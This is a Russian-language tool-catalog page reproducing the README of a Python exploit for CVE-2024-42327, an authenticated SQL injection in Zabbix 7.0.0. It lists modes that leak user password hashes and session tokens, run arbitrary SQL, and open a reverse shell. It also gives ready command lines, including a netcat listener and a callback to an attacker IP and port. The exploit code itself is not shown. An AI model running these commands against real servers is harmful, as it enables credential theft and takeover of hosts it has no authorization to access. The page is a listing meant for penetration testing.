Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-42327_Zabbix_SQLi — Только для образовательных целей. Пожалуйста, не используйте против неавторизованных систем. | Kitploit
Инструменты/GitHubGitHub/874anthony/cve-2024-42327_zabbix_sqli
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHub874anthony/cve-2024-42327_zabbix_sqli

CVE-2024-42327_Zabbix_SQLi

Только для образовательных целей. Пожалуйста, не используйте против неавторизованных систем.

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛡️ Zabbix 7.0.0 Эксплойт SQL-инъекции

Скрипт на Python для эксплуатации авторизованной SQL-инъекции в Zabbix 7.0.0, поддерживающий несколько режимов работы: извлечение данных пользователей, утечка токенов сессий, удалённое выполнение команд (RCE) и выполнение произвольных SQL-запросов.

⚠️ ПРЕДУПРЕЖДЕНИЕ:
Данный скрипт предназначен только для образовательных и авторизованных пентестов.
Не используйте его на системах, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения.
Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.


✨ Возможности

  • ✅ Авторизованная SQL-инъекция против Zabbix 7.0.0
  • 🧑‍💻 Извлечение хешей пользователей из БД
  • 🔐 Утечка токенов сессий
  • 🐚 Удалённое выполнение команд через reverse shell (требуется admin token)
  • 🧠 Выполнение произвольных SQL-запросов

🔧 Требования

  • Python 3.6+
  • Библиотека requests

Установите зависимости при необходимости:

root@kitploit:~
pip install requests

🚀 Использование

root@kitploit:~
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [дополнительные аргументы...]

🔘 Доступные режимы

РежимОписаниеТребуется admin token
leak-usersИзвлекает все ID пользователей, имена, хеши паролей и роли❌
leak-tokensИзвлекает все активные ID сессий из базы данных❌
rceЗапускает reverse shell через эксплуатацию item.create✅
customВыполнение любого произвольного SQL-запроса через инъекцию❌

🧪 Примеры

Извлечение хешей пользователей

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users

Утечка токенов сессий

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens

Удалённое выполнение команд (Reverse Shell)

root@kitploit:~
# Start a listener first:
nc -lvnp 9001

# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce

Произвольная SQL-инъекция

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"

📁 Структура проекта

root@kitploit:~
sqliZabbix.py      # Основной скрипт эксплойта
README.md          # Эта документация

🧑‍💻 Автор

Anthony (@874anthony)

Создано с любовью и любопытством 🐍

🔐 Лицензия

Этот проект выпущен под лицензией MIT. Пожалуйста, используйте ответственно.

Скачать инструмент